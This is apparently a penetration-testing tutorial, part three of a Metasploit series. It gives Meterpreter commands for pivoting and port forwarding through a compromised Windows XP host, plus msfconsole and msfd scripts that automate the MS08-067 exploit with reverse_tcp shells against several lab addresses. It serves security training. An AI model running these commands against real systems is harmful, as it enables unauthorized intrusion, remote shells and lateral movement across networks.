MSF Fundamentals 2017 (Part 3 of 3) – Pivoting and Automation

This is quick-hit version of part three of a three part series on Metasploit Fundamentals that I wrote to update my previous work (from 2014) on Metasploit. If you’re looking for a more hands-on/in-depth version of this article you can access training on this topic here.

The purpose of this article is to cover pivoting, port-forwarding, and automation to expand the reach of your tools and reduce the amount of time you spend on repetitive work.  Part one covered starting up the MSF, finding an exploit, finding a matching payload, and configuring everything up to the point of launching the exploit. Part two covered exploitation and post-exploitation modules to the point where you are comfortable with the various ways of manipulating a system after you’ve opened a session to it.  This training assumes you’re using a 2016 variant of Kali Linux and that it’s patched up to at least August 2016. If that’s true, then let’s go!

Notes

  1. This article assumes that you are already familiar with the contents of parts one and two.  If you aren’t, go back and read that now.
  2. For the purposes of this article we will assume that the vulnerable system is on 10.20.30.100, and that the machine running MSF is on 10.20.30.200 and dual-homed at 192.168.33.50, both in a /24 subnet.  We’ll furthermore assume that the target is a Windows XP machine that you have already exploited the system using MS08-067, as detailed in part one, and have a running Meterpreter session.
  3. As these are quick hit notes I haven’t included screenshots/outputs. They’re intended for you to follow along with and modify as appropriate for your environment.  If you want to quickly establish a test environment that will support all of these tests you can do so by installing a Windows XP SP1 VM with two accounts, then log into one of the accounts, log back out, and leave the machine running.
  4. I’m using the terminology “MSF> ” to refer to things that take place from an MSF console perspective, “MTR> ” to refer to things that take place from a Meterpreter session, and “SHL> ” to refer to things that take place on a Linux shell (e.g. bash).

Pivoting

MTR> ipconfig /all                                  # Gather network information
MTR> ifconfig                                       # Gather network information
MTR> run autoroute -s 192.168.33.0/24               # Establish automatic routing within Metasploit
MTR> run autoroute -p                               # Print automatic routing tables
MTR> run autoroute -d -s 192.168.33.0/24            # Delete automatic routing for this subnet

NOTE: After autoroute is setup Metasploit will natively route using this data.

Port Forwarding
NOTE: Set up autoroute before using port forwarding.

MTR> portfwd add -l 4480 -p 80 -r 192.168.33.44     # Forward localhost:4480 to 192.168.33.44:80
MTR> portfwd delete -l 4480 -p 80 -r 192.168.33.44  # Delete localhost:4480 to 192.168.33.44:80 forwarding
MTR> portfwd list                                   # List active forwardings
MTR> portfwd flush                                  # Clear all forwardings
MTR> netcat localhost 4480                          # Connect to 192.168.33.44:80

Automation

To automate compromising 10.20.30.100 and 10.20.30.102 from the command line:
SHL>
msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; \
set LHOST 10.20.30.200; set LPORT 54321; set RHOST 10.20.30.100; exploit; set RHOST 10.20.30.101; \
exploit; set RHOST 10.20.30.102; exploit; exit”

Using msfd to provide a consistent backend for further automating (sample resource file):

SHL> msfd
SHL> msfd -q -p 31337
SHL> msfconsole -r /path/to/resource.file # Load a resource file (commands / Ruby) XX

Weaponized execution using msfd backend and automated session processing target specified in environment variable “IPADDRESS”:

SHL> echo “resource /path/to/resource.file” | netcat localhost 31337
SHL> echo -n -e “use exploit/windows/smb/ms08_067_netapi\nset payload windows/meterpreter/reverse_tcp\nset LHOST 10.20.30.200\nset LPORT 54321\nset RHOST $IPADDRESS\nexploit\nexit”

That’s all for part three… good hunting!